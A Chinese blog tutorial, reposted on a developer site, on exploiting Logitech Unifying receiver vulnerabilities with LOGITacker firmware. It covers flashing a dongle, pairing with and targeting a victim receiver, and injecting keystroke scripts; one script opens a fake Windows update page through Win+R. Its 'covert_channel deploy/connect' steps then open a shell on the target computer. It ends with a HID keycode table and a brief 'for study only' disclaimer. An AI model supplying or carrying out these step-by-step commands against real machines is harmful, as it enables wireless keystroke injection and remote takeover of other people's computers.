badusb代码_罗技漏洞利用制作BADUSB

PS:由于Badusb.pw服务器到期,且我没有备份我的数据。幸好朋友的公众号有备份因此我就搬过来了.

近日,有研究人员表示发现了罗技的 Uni­fy­ing USB 接收器存在 4 个新的安全漏洞。这个接收器可将六个不同的设备连接到同一个计算机。据悉,这些漏洞是由于罗技加密狗的过时固件造成的,攻击者可以依靠漏洞通过物理方式访问目标计算机,同时发动点击注入攻击,并记录鼠标点击记录最终实现控制操作系统。
目前,这四个漏洞均已上报给罗技公司,但对方表示只会修复其中两个,另外两个将继续保持 “开放” 状态:

CVE-2019-13054 和 CVE-2019-13055 漏洞将在 2019 年 8 月发布的更新中修复,CVE-2019013052 和 CVE-2019-13053 已经放弃治疗。
Hack­sub 用于通过 RF 枚举和测试 Log­itech 无线输入设备的漏洞,设备通过串口来连接控制。

CVE-2019-13054 和 CVE-2019-13055 这两个漏洞分别能够影响 Log­itech R500、Log­itech SPOT­LIGHT 和所有具有键盘功能的加密 Uni­fy­ing 设备。原本漏洞可使攻击者对计算机进行物理访问,经过修复后,将成为 “通过转储来主动获取链路的加密密钥”。

mame82 大佬利用 CVE-2019-13055 漏洞对罗技 K360 的键盘进行了攻击演示,仅通过一个键盘,就能够实现从所有配对设备中转储 AES 密钥和地址,随后便能够窃听和解密射频(RF)传输,并且这些操作都是即时的。

mame82 大佬表示,在有密钥的情况下,攻击者可以注入任意内容、执行任意操作,以及远程窃听用户系统和实时解密键盘输入的内容,并且这对所有具有键盘功能的加密 Uni­fy­ing 设备都适用。同时,执行注入的设备也很难被用户发现,因为地址是预先知道的,而实际设备并不在其应用范围内。

制作教程

提醒:本教程,只做漏洞演示与漏洞重现。仅供学习研究。一切违法与本作者无关!本教程,需要有一定的shell操作基础。别总是DD我这是什么情况这怎么会这样!不懂直接下面评论!你们评论在下面大家可以一起解决问题。

需要的材料有

1.C-U0007 罗技优联接收器
2.April Brother Dongle (四月兄弟加密狗)
发射器一定要问清楚是不是 cu0007 的别整个 08!

需要的软件有:

Putty
An­other TermLite (安卓)
uni­fy­ing

首先将固件刷入接收器

  • 点击下载固件
    用卡针啊,很细很细之类的物体按发射器上有个小孔,插入电脑,这时候电脑就会加载一个新的盘符,这个就是接收器的bootloader内存空间,这时候就将我们之前下载好固件直接移至该盘符内,等待覆盖完成后,电脑上的新盘符会消失,在重新插入计算机内进行下一步。

b884773acb204d2254e905c96a11d1e8.png

小孔

在将发射器与接收器插入电脑。

①需要软件 uni­fy­ing 打开后点击 高级

813059b3a5868ec851de9c1a6fe3a4cd.png

②在终端内输入 pair device run 并且运行!

1191a0d4e1d9dd7a4333d789d43e7e2a.png

③点击配对新设备

efcca6c2d9d3e34c84ed5f52c610a9dc.png

④这里就是你新配对的MAC地址

534440cdbb192fc7f67f25128dfd6ed0.png

⑤这里查看你新添加的设备

bba2df30ca3a409586ae5046788aca84.png

一、配置发射器环境

1.1、插入接收器

将你的 April USB Don­gle(接收器)插入电脑,也就是这个东西。

b793f7fbe486026b7178ebf8e4492fe4.png

April USB Dongle

1.2、安装

等待安装好驱动。

1.3、设备管理器

  • 右键我的电脑->管理->设备管理器,找到端口。

1ca823c75eb2475d1b09ffd876754c3a.png

  • 设备管理器
  • 右键USB 串行设备(COM3)->属性。

1.4、配置端口

在弹出的新窗口选择第二个端口设置。

222494016574fe3a06da2404e980aed7.png

二、配置PuTTY

2.1、下载

如果你还没 PuTTY 的话,请自行通过搜索引擎搜索并下载。

2.2、配置终端

  • Serial
    COM[3] 这里的数字取决于你在设备管理器中看到的端口号。

4e07eaafa62276d51a713ba49916812a.png

Serial

Keyborad

da8ef1384ff471994770ae0edf1ccf48.png

Keyborad

  • Session

    64a2cadd7c50800aee4ab2a575325dbf.png

    Session
  • Save
    保存一下刚刚配置好的那些,下次就可以双击这个直接打开。

05c165a9710f96e6fd4e157a976eae19.png

Save

  • Open
    等有字出现,发射器和PuTTY配置也就完成了。

三、使用

3.1、使用前提

你已经将你的发射器以及罗技存在漏洞的 USB 接收器插入电脑。

3.2、设备匹配

  • 输入devices storage load XX:XX:XX:XX:XX(注意:此处MAC地址为load之前接收器的MAC地址,另外可以按TAB键自动补全代码,或者命令写到load时候按tab补全MAC地址,一般来说要么是第一个要么是最后一个,下面那个也是同样的道理)。

  • 出现下面所示,说明就是加载成功了。

5222e2aa6201fd1f2866905313982c7b.png

  • 输入inject target XX:XX:XX:XX:XX选择注入设备(注意:这里的MAC地址应该是跟上面MAC地址相同)。

3.3、简单代码应用

  • script编辑一段脚本。

3debcbfd5cbdde89aa4d4471e88df6c7.png

  • 具体原理就是用win + r,然后输入iexplore -k http://fakeupdate.net/wnc/,再按下F11,就达到以假乱真的效果。

  • script press GUI r 先按win+r,打开cmd。

  • script delay 500 设置500毫秒的延迟。

  • script string iexplore -k http://fakeupdate.net/wnc/ 输入。

  • script delay 500 再延迟500毫秒。

  • script press enter 按下回车。

  • script show 在检测一下代码是否如我们写的那一般。

02b12f2d87f8fe91af3ea69d5896e903.png

                                                       script-show

确认无误后用 inject execute 执行代码。

fc4df42e01a3af08303fdef626f6d747.png

inject-execute

  • 出现上图所示的内容呢,就说明你已经成功执行了。

3.4、更新固件

  • 点击下载固件

  • 首先更新固件之前你得先连接上PuTTY,输入erase_flash,目的是为了刷新一下flash,以确保更新后能正常使用。

  • 拔下发射器,然后用卡针啊,很细很细之类的物体按发射器上有个小孔,插入电脑,这时候电脑就会加载一个新的盘符,这个就是发射器的bootloader内存空间,这时候就将我们之前下载好固件直接移至该盘符内,把更新文件拉进去后,会自动更新。

b884773acb204d2254e905c96a11d1e8.png

小孔

  • 更新完固件后,你就会发现最前面前缀变成了HackUSB。

四、一键进入电脑shell

4.1、covert_channel模块

  • covert_channel模块

4.2、运行脚本

  • covert_channel deploy XX:XX:XX:XX:XX 运行脚本(这里可能需要几分钟,如果不成功需要多执行几遍。或者关闭目标机的输入法)

  • 出现下图所示,就说明你成功注入了。

97ca1afccd884f3d4cd1d96cf0cd24a4.png

成功注入

输入covert_channel connnec XX:XX:XX:XX:XX进入控制,显示如下图所示就是成功进入电脑的shell了。

e8a1b1183deb140bc55348e1483bbfda.png

shell

  • 如果需要退出,输入!exit

五、手机连接

请参考 PDF 文档。

六、命令介绍。

有待完善~。

七、键位

#define KEY_NULL 0x00 // null#define KEY_A 0x04 // A#define KEY_B 0x05 // B#define KEY_C 0x06 // C#define KEY_D 0x07 // D#define KEY_E 0x08 // E#define KEY_F 0x09 // F#define KEY_G 0x0A // G#define KEY_H 0x0B // H#define KEY_I 0x0C // I#define KEY_J 0x0D // J#define KEY_K 0x0E // K#define KEY_L 0x0F // L#define KEY_M 0x10 // M#define KEY_N 0x11 // N#define KEY_O 0x12 // O#define KEY_P 0x13 // P#define KEY_Q 0x14 // Q#define KEY_R 0x15 // R#define KEY_S 0x16 // S#define KEY_T 0x17 // T#define KEY_U 0x18 // U#define KEY_V 0x19 // V#define KEY_W 0x1A // W#define KEY_X 0x1B // X#define KEY_Y 0x1C // Y#define KEY_Z 0x1D // Z#define KEY_1 0x1E // 1 !#define KEY_2 0x1F // 2 @#define KEY_3 0x20 // 3 ##define KEY_4 0x21 // 4 $#define KEY_5 0x22 // 5 %#define KEY_6 0x23 // 6 ^#define KEY_7 0x24 // 7 &#define KEY_8 0x25 // 8 *#define KEY_9 0x26 // 9 (#define KEY_0 0x27 // 0 )#define KEY_ENTER 0x28 // enter#define KEY_ESC 0x29 // esc#define KEY_BACKSPACE 0x2A // backspace#define KEY_TAB 0x2B // tab#define KEY_SPACE 0x2C // space#define KEY_SUB 0x2D // - and _#define KEY_EQUAL 0x2E // = and +#define KEY_LEFT_BRACKET 0x2F // [ and {#define KEY_RIGHT_BRACKET 0x30 // ] and }#define KEY_VERTICAL_LINE 0x31 // \#define KEY_WAVE 0x32 // ` and ~#define KEY_SEMICOLON 0x33 // ; and :#define KEY_QUOTE 0x34 // ' and \#define KEY_THROW 0x35 // ~ and `#define KEY_COMMA 0x36 // , and <#define KEY_DOT 0x37 // . and >#define KEY_QUESTION 0x38 // / and ?#define KEY_CAPS_LOCK 0x39 // caps Lock#define KEY_F1 0x3A // f1#define KEY_F2 0x3B // f2#define KEY_F3 0x3C // f3#define KEY_F4 0x3D // f4#define KEY_F5 0x3E // f5#define KEY_F6 0x3F // f6#define KEY_F7 0x40 // f7#define KEY_F8 0x41 // f8#define KEY_F9 0x42 // f9#define KEY_F10 0x43 // f10#define KEY_F11 0x44 // f11#define KEY_F12 0x45 // f12#define KEY_PRT_SCR 0x46 // prtint screen#define KEY_SCOLL_LOCK 0x47 // scoll Lock#define KEY_PAUSE 0x48 // pause#define KEY_INS 0x49 // insert#define KEY_HOME 0x4A // home#define KEY_PAGEUP 0x4B // pageup#define KEY_DEL 0x4C // del#define KEY_END 0x4D // end#define KEY_PAGEDOWN 0x4E // pagedown#define KEY_RIGHT_ARROW 0x4F // →#define KEY_LEFT_ARROW 0x50 // ←#define KEY_DOWN_ARROW 0x51 // ↓#define KEY_UP_ARROW 0x52 // ↑#define KEY_PAD_NUMLOCK 0x53#define KEY_LCTRL 0xE0 // left ctrl 0x01#define KEY_LALT 0xE2 // left Alt 0x04#define KEY_LSHFIT 0xE1 // left Shift 0x02#define KEY_LWIN 0xE3 // left windows 0x08#define KEY_RWIN 0xE7 // right windows 0x80

七、免责声明

  1. Hackusb 只用于测试与学习研究,只供在本机测试,在他人机子上测试而造成的损失我不负任何责任。
    2.Hackusb 仅为测试工具,不可违法使用。
    使用 Hackusb 后默认同意以上。

八.帮助

原作者mame82大佬

https://github.com/mame82/LOGITacker

                                               来源于(原)badusb.pw/Hackusb.cn

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值